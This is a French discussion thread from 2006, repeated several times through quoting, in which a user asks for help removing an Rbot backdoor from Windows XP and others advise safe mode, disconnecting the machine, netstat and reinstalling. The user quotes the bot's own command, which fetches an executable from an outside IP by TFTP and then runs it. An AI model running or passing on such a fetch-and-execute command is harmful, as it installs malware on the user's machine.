les trois (base de registre + gest. de tâche ) sont à nouveau là ! !!
Essayez de démarrer en mode sans échec et allez voir sur votre DD s'il est possible de supprimer le exe fautif. Le mieux serait de trouver ce qui le "lance"...
Ahhhhh merci ! Effectivement en le supprimant "à la manière forte" les antivirus arrivent enfin à le détecter ! Backdoor.Win32.Rbot.bjd !!
avant ils passaient dessus sans le voir C'est nul un antivirus :(
On 18 Sep 2006 02:12:18 -0700, culpa@caramail.com wrote:
les trois (base de registre + gest. de tâche ) sont à nouveau là ! !!
Essayez de démarrer en mode sans échec et allez voir sur votre DD s'il
est possible de supprimer le exe fautif.
Le mieux serait de trouver ce qui le "lance"...
Ahhhhh merci !
Effectivement en le supprimant "à la manière forte" les antivirus
arrivent enfin à le détecter !
Backdoor.Win32.Rbot.bjd !!
avant ils passaient dessus sans le voir
C'est nul un antivirus :(
les trois (base de registre + gest. de tâche ) sont à nouveau là ! !!
Essayez de démarrer en mode sans échec et allez voir sur votre DD s'il est possible de supprimer le exe fautif. Le mieux serait de trouver ce qui le "lance"...
Ahhhhh merci ! Effectivement en le supprimant "à la manière forte" les antivirus arrivent enfin à le détecter ! Backdoor.Win32.Rbot.bjd !!
avant ils passaient dessus sans le voir C'est nul un antivirus :(
Nina Popravka
On Tue, 19 Sep 2006 12:17:19 +0200, Cyrius wrote:
Si un virus est passé, peu importe la raison, la seule façon de le supprimer correctement est de le faire quand il n'est pas actif... d'où le scan en mode sans échec. C'est vrai, mais c'est quand même assez curieux qu'aucun anti-virus
n'ait été capable de voir l'intrus, quitte à déclarer qu'il ne pouvait rien faire, et proposer un scan au prochain démarrage... -- Nina
On Tue, 19 Sep 2006 12:17:19 +0200, Cyrius <cyrius@belgacom.net>
wrote:
Si un virus est passé, peu importe la raison, la seule façon de le
supprimer correctement est de le faire quand il n'est pas actif...
d'où le scan en mode sans échec.
C'est vrai, mais c'est quand même assez curieux qu'aucun anti-virus
n'ait été capable de voir l'intrus, quitte à déclarer qu'il ne pouvait
rien faire, et proposer un scan au prochain démarrage...
--
Nina
Si un virus est passé, peu importe la raison, la seule façon de le supprimer correctement est de le faire quand il n'est pas actif... d'où le scan en mode sans échec. C'est vrai, mais c'est quand même assez curieux qu'aucun anti-virus
n'ait été capable de voir l'intrus, quitte à déclarer qu'il ne pouvait rien faire, et proposer un scan au prochain démarrage... -- Nina
culpa
On Tue, 19 Sep 2006 12:17:19 +0200, Cyrius wrote:
Si un virus est passé, peu importe la raison, la seule façon de le supprimer correctement est de le faire quand il n'est pas actif... d'où le scan en mode sans échec. C'est vrai, mais c'est quand même assez curieux qu'aucun anti-virus
n'ait été capable de voir l'intrus, quitte à déclarer qu'il ne po uvait rien faire, et proposer un scan au prochain démarrage... -- Nina
Au secours !!! Il n'a pas l'air d'être parti... Toujours aucune détection par les antivirus... (mis à part celle dont j'avais parlé ci-dessus)
mais le pc fait des truc tout seul régulièrement :
la fenêtre executer un programme s'ouvre et marque "cmd.exe"
tftp -i 82.253.157.4 GET msqarsm.exe msqarsm.exe exit
On fait quoi dans ces cas là ? ôO
On Tue, 19 Sep 2006 12:17:19 +0200, Cyrius <cyrius@belgacom.net>
wrote:
Si un virus est passé, peu importe la raison, la seule façon de le
supprimer correctement est de le faire quand il n'est pas actif...
d'où le scan en mode sans échec.
C'est vrai, mais c'est quand même assez curieux qu'aucun anti-virus
n'ait été capable de voir l'intrus, quitte à déclarer qu'il ne po uvait
rien faire, et proposer un scan au prochain démarrage...
--
Nina
Au secours !!!
Il n'a pas l'air d'être parti...
Toujours aucune détection par les antivirus... (mis à part celle dont
j'avais parlé ci-dessus)
mais le pc fait des truc tout seul régulièrement :
la fenêtre executer un programme s'ouvre et marque "cmd.exe"
tftp -i 82.253.157.4 GET msqarsm.exe
msqarsm.exe
exit
Si un virus est passé, peu importe la raison, la seule façon de le supprimer correctement est de le faire quand il n'est pas actif... d'où le scan en mode sans échec. C'est vrai, mais c'est quand même assez curieux qu'aucun anti-virus
n'ait été capable de voir l'intrus, quitte à déclarer qu'il ne po uvait rien faire, et proposer un scan au prochain démarrage... -- Nina
Au secours !!! Il n'a pas l'air d'être parti... Toujours aucune détection par les antivirus... (mis à part celle dont j'avais parlé ci-dessus)
mais le pc fait des truc tout seul régulièrement :
la fenêtre executer un programme s'ouvre et marque "cmd.exe"
tftp -i 82.253.157.4 GET msqarsm.exe msqarsm.exe exit
On fait quoi dans ces cas là ? ôO
Nina Popravka
On 19 Sep 2006 05:28:51 -0700, wrote:
tftp -i 82.253.157.4 GET msqarsm.exe msqarsm.exe exit
On fait quoi dans ces cas là ? ôO On se dit qu'on a gagné un très joli bot :-)))))
Et on cherche où il est. -- Nina
On 19 Sep 2006 05:28:51 -0700, culpa@caramail.com wrote:
tftp -i 82.253.157.4 GET msqarsm.exe
msqarsm.exe
exit
On fait quoi dans ces cas là ? ôO
On se dit qu'on a gagné un très joli bot :-)))))
tftp -i 82.253.157.4 GET msqarsm.exe msqarsm.exe exit
On fait quoi dans ces cas là ? ôO On se dit qu'on a gagné un très joli bot :-)))))
Et on cherche où il est. -- Nina
Pascal Hambourg
Salut,
mais le pc fait des truc tout seul régulièrement :
la fenêtre executer un programme s'ouvre et marque "cmd.exe"
tftp -i 82.253.157.4 GET msqarsm.exe msqarsm.exe exit
On fait quoi dans ces cas là ? ôO
On commence par déconnecter *physiquement* la machine du réseau ou d'internet. Ensuite, on peut éventuellement prévenir Free/Proxad que son client qui a l'adresse ci-dessus héberge des trucs douteux sur un serveur TFTP.
Salut,
mais le pc fait des truc tout seul régulièrement :
la fenêtre executer un programme s'ouvre et marque "cmd.exe"
tftp -i 82.253.157.4 GET msqarsm.exe
msqarsm.exe
exit
On fait quoi dans ces cas là ? ôO
On commence par déconnecter *physiquement* la machine du réseau ou
d'internet. Ensuite, on peut éventuellement prévenir Free/Proxad que son
client qui a l'adresse ci-dessus héberge des trucs douteux sur un
serveur TFTP.
mais le pc fait des truc tout seul régulièrement :
la fenêtre executer un programme s'ouvre et marque "cmd.exe"
tftp -i 82.253.157.4 GET msqarsm.exe msqarsm.exe exit
On fait quoi dans ces cas là ? ôO
On commence par déconnecter *physiquement* la machine du réseau ou d'internet. Ensuite, on peut éventuellement prévenir Free/Proxad que son client qui a l'adresse ci-dessus héberge des trucs douteux sur un serveur TFTP.
culpa
On se dit qu'on a gagné un très joli bot :-))))) Et on cherche où il est. -- Nina
Merci... voilà qui m'avance grandement :(
Comme déjà dit KasperSky > Aucun objet dangeureux trouvé. Secuser > Que dalle Panda online > Rien Avast > Nada Antivir "parapluie" > nothing
Dans la base de registre, plus rien de "suspect"...
Et pourtant ce truc s'execute toutes les n minutes !!!
Une autre idée ?
===== Logfile of HijackThis v1.99.1 Scan saved at 15:04:26, on 19/09/2006 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
On se dit qu'on a gagné un très joli bot :-)))))
Et on cherche où il est.
--
Nina
Merci... voilà qui m'avance grandement :(
Comme déjà dit
KasperSky > Aucun objet dangeureux trouvé.
Secuser > Que dalle
Panda online > Rien
Avast > Nada
Antivir "parapluie" > nothing
Dans la base de registre, plus rien de "suspect"...
Et pourtant ce truc s'execute toutes les n minutes !!!
Une autre idée ?
=====
Logfile of HijackThis v1.99.1
Scan saved at 15:04:26, on 19/09/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
On se dit qu'on a gagné un très joli bot :-))))) Et on cherche où il est. -- Nina
Merci... voilà qui m'avance grandement :(
Comme déjà dit KasperSky > Aucun objet dangeureux trouvé. Secuser > Que dalle Panda online > Rien Avast > Nada Antivir "parapluie" > nothing
Dans la base de registre, plus rien de "suspect"...
Et pourtant ce truc s'execute toutes les n minutes !!!
Une autre idée ?
===== Logfile of HijackThis v1.99.1 Scan saved at 15:04:26, on 19/09/2006 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Et pourtant ce truc s'execute toutes les n minutes !!! Ce truc communique...
Donc un netstat -b vous donnera le nom du process qui communique... -- Nina
Nina Popravka
On Tue, 19 Sep 2006 15:05:23 +0200, Pascal Hambourg wrote:
Ensuite, on peut éventuellement prévenir Free/Proxad que son client qui a l'adresse ci-dessus héberge des trucs douteux sur un serveur TFTP. Y en a tellement que j'ai abandonné...
Ensuite, on peut éventuellement prévenir Free/Proxad que son
client qui a l'adresse ci-dessus héberge des trucs douteux sur un
serveur TFTP.
Y en a tellement que j'ai abandonné...
On Tue, 19 Sep 2006 15:05:23 +0200, Pascal Hambourg wrote:
Ensuite, on peut éventuellement prévenir Free/Proxad que son client qui a l'adresse ci-dessus héberge des trucs douteux sur un serveur TFTP. Y en a tellement que j'ai abandonné...
Tu crois que ça sert à quelque chose ? -- Nina
culpa
On commence par déconnecter *physiquement* la machine du réseau ou d'internet.
C'est ce que j'ai fait, raison pour laquelle j'ai pu voir la ligne de commande...(tftp ->"Délai dépassé")
mais le "truc" continue de tourner, et reste introuvable :(
Un formatage total + réinstallation peut résoudre le problème ? Ou je risque d'attraper un truc à la première connexion internet pour télécharger un anti-virus ou mettre à jour mon Xp via windows upadate ?
Merci d'avance de vos conseils.
On commence par déconnecter *physiquement* la machine du réseau ou
d'internet.
C'est ce que j'ai fait, raison pour laquelle j'ai pu voir la ligne de
commande...(tftp ->"Délai dépassé")
mais le "truc" continue de tourner, et reste introuvable :(
Un formatage total + réinstallation peut résoudre le problème ?
Ou je risque d'attraper un truc à la première connexion internet pour
télécharger un anti-virus ou mettre à jour mon Xp via windows
upadate ?
On commence par déconnecter *physiquement* la machine du réseau ou d'internet.
C'est ce que j'ai fait, raison pour laquelle j'ai pu voir la ligne de commande...(tftp ->"Délai dépassé")
mais le "truc" continue de tourner, et reste introuvable :(
Un formatage total + réinstallation peut résoudre le problème ? Ou je risque d'attraper un truc à la première connexion internet pour télécharger un anti-virus ou mettre à jour mon Xp via windows upadate ?
Merci d'avance de vos conseils.
Nina Popravka
On 19 Sep 2006 06:17:20 -0700, wrote:
Un formatage total + réinstallation peut résoudre le problème ? Certainement :-)))))
Ou je risque d'attraper un truc à la première connexion internet pour télécharger un anti-virus ou mettre à jour mon Xp via windows upadate ? Oui mais non.
Si vous êtes derrière un routeur, aucun souci. En connexion directe, c'est évidemment plus litigieux. Toutefois je ne connais pas de bots dans le genre du vôtre qui saute tout seul sur la machine, tous ceux que j'ai croisés demandaient une intervention du non-cerveau de l'utilisateur. -- Nina
On 19 Sep 2006 06:17:20 -0700, culpa@caramail.com wrote:
Un formatage total + réinstallation peut résoudre le problème ?
Certainement :-)))))
Ou je risque d'attraper un truc à la première connexion internet pour
télécharger un anti-virus ou mettre à jour mon Xp via windows
upadate ?
Oui mais non.
Si vous êtes derrière un routeur, aucun souci.
En connexion directe, c'est évidemment plus litigieux.
Toutefois je ne connais pas de bots dans le genre du vôtre qui saute
tout seul sur la machine, tous ceux que j'ai croisés demandaient une
intervention du non-cerveau de l'utilisateur.
--
Nina
Un formatage total + réinstallation peut résoudre le problème ? Certainement :-)))))
Ou je risque d'attraper un truc à la première connexion internet pour télécharger un anti-virus ou mettre à jour mon Xp via windows upadate ? Oui mais non.
Si vous êtes derrière un routeur, aucun souci. En connexion directe, c'est évidemment plus litigieux. Toutefois je ne connais pas de bots dans le genre du vôtre qui saute tout seul sur la machine, tous ceux que j'ai croisés demandaient une intervention du non-cerveau de l'utilisateur. -- Nina